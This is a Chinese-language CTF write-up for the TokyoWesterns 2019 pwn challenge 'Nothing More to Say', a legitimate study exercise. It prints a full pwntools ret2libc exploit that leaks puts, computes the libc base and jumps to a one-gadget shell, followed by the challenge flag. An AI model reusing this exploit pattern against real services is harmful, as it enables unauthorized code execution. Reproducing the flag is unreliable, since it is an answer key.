【TokyoWesterns CTF 5th 2019】Pwn--Nothing More to Say

TokyoWesterns CTF 5th 2019Pwn

应该是用了个非预期解……

Description:

Japan is fucking hot.

nc nothing.chal.ctf.westerns.tokyo 10001

Solution:

这道题本意是用ret2shellcode技术,可是我一直没有成功(菜鸡叹息

于是我就换了种思路,用ret2libc,一开始是用LibcSearcher库找 libc
但是发现泄露出来的libc 2.27的那个版本不能使用,不知道为什么

所以我就直接用ubuntu 18.04内置的libc 2.27来做了

应该是非预期解吧emmmmm

Image

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="amd64")
# p = process('./warmup')
p = remote('nothing.chal.ctf.westerns.tokyo', 10001)
elf = ELF('./warmup', checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)  # ubuntu 18.04 libc 2.27
addr_rdi_r = 0x0000000000400773  # pop rdi ; ret
addr_main = 0x00000000004006BA
plt_puts = elf.plt['puts']
got_puts = elf.got['puts']

pd = 'a' * 0x108
pd += p64(addr_rdi_r)
pd += p64(got_puts)
pd += p64(plt_puts)
pd += p64(addr_main)
p.sendlineafter('Please pwn me :)\n', pd)

p.recv(0x10b)
addr_puts = u64(p.recv(6).ljust(8, '\x00'))
print hex(addr_puts)
libcbase = addr_puts - libc.sym['puts']

pd = 'a' * 0x108
pd += p64(libcbase + 0x4f2c5)
p.sendlineafter('Please pwn me :)\n', pd)
p.interactive()

Flag:

1
TWCTF{AAAATsumori---Shitureishimashita.}

本文标题:【TokyoWesterns CTF 5th 2019】Pwn--Nothing More to Say

文章作者:binLep

发布时间:2019-09-08, 13:25:09

最后更新:2019-09-08, 16:20:04

原始链接:https://binlep.github.io/old_blog_01/2019/09/08/【TokyoWesterns CTF 5th 2019】Pwn--nothing more to say/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. Description:
  2. 2. Solution:
  3. 3. Flag:
|